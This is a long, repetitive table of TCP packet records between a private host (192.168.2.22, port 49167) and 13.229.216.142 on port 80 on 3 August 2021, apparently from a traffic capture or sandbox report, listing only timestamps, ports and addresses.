Aug 3, 2021 16:50:37.989557028 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989588022 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989608049 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989634037 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989635944 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989680052 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989687920 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989712000 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989731073 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989753008 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989754915 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989789963 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989801884 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989826918 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989842892 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989867926 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989892960 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989903927 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989916086 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989944935 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989953041 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.989988089 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.989995956 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990027905 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990041018 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990070105 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990080118 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990098000 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990114927 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990137100 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990139008 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990174055 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990184069 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990210056 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990210056 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990250111 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990257978 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990284920 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990291119 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990325928 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990329027 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990360022 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990374088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990395069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990406990 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990432978 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990434885 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990468979 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990482092 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990508080 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990509987 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990550995 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990571022 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990592957 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990623951 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990628004 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990664959 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990667105 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990686893 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990704060 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990717888 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990744114 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990751028 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990786076 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990786076 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990823030 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990834951 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990865946 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990873098 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990910053 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990921974 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990942955 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990953922 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.990973949 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.990987062 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991013050 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991050005 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991050959 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991065025 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991084099 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991096973 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991107941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991158009 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991175890 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991192102 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991224051 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991257906 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991276979 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991288900 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991314888 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991328955 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991348028 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991358042 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991389990 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991406918 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991421938 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991449118 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991451979 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991491079 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991499901 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991529942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991545916 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991560936 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991575956 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991601944 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991605043 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991642952 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991676092 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991704941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991738081 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991777897 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991808891 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991837978 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991842031 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991868019 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991879940 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991897106 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991909981 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991925001 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991936922 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991957903 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.991962910 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.991988897 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992007971 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992021084 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992032051 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992048025 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992064953 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992078066 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992088079 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992106915 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992125988 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992136002 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992149115 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992166996 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992186069 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992197990 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992213011 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992225885 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992244959 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992263079 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992269993 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992296934 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992307901 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992326021 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992343903 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992358923 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992368937 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992387056 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992402077 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992419958 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992455006 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992464066 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992486954 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992486954 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992506027 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992520094 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992535114 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992551088 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992563009 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992578983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992610931 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992613077 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992624998 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992640018 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992650986 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992669106 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992688894 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992697001 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992708921 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992724895 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992758989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992758989 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992774010 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992790937 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992800951 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992821932 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992837906 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992855072 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992882013 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992885113 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992908955 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992911100 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992938995 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992950916 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.992968082 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.992979050 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.993009090 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.993048906 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.998163939 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.002814054 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.143132925 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143408060 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143501043 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143527985 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143548965 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143568993 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143588066 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143608093 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143626928 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143647909 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143666983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143690109 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143712044 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143731117 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143750906 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143786907 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143814087 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143834114 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143855095 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143874884 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143896103 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143917084 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143940926 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143961906 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.143981934 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144001961 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144022942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144042969 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144063950 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144083023 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144105911 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144129038 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144149065 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144171000 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144191027 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144212008 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144229889 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144249916 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144273043 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144294977 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144314051 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144335032 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144355059 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144375086 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144395113 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144414902 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144438028 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144460917 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144481897 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144505024 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144526958 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144546986 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144571066 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144588947 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144613028 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144635916 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144656897 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144676924 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144700050 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144721031 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144741058 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144759893 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144783974 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144808054 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144830942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144853115 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144874096 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144892931 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144913912 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144933939 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144957066 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.144979954 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.145013094 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146461964 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146464109 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146487951 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146492004 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146492004 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146495104 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146498919 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146502018 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146505117 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146507978 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146509886 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146512985 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146516085 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146538973 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146538973 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146542072 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146544933 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146548033 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146552086 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146554947 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146558046 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146560907 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146562099 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146564007 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146567106 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146570921 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146574020 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146576881 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146579981 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146583080 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146584988 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146586895 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146590948 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146594048 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146610022 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146610022 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146614075 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146617889 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146620989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146624088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146626949 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146630049 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146631956 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146632910 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146636009 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146639109 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146641970 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146656036 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146658897 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146660089 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146662951 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146666050 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146667957 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146671057 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146673918 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146677017 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146680117 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146682978 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146683931 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146687031 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146689892 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146692038 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146694899 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146697998 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146699905 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146703005 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146704912 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:38.146706104 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:38.146708012 CEST	49167	80	192.168.2.22	13.229.216.142
